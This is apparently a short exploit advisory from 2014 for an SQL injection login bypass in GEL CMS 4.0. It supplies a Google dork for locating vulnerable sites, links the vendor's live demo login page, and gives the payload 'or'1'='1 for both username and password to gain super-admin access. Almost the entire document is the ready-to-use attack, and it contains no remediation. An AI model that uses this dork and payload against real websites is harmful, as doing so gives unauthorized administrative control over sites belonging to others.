# Exploit Title: SQLi Bypass super-admin GEL CMS 4.0
# Google Dork: inurl:/contact-us_id7.php
# Date: 11 August 2014
# Exploit Author: Guillermo Garcia Marcos @GuilleSec
# Severity: High
# Vendor Homepage: http://www.oklahoma-website-design.com/
# Software Link: http://www.oklahoma-website-design.com/
# Versions: 4.00 and latest versions.
# Tested on: Debian (Apache+MySQL)
DEMO: http://www.oklahoma-website-design.com/login.php
Loginpanel:
domain.lol/login.php
SQL string:
Username: 'or'1'='1
Password: 'or'1'='1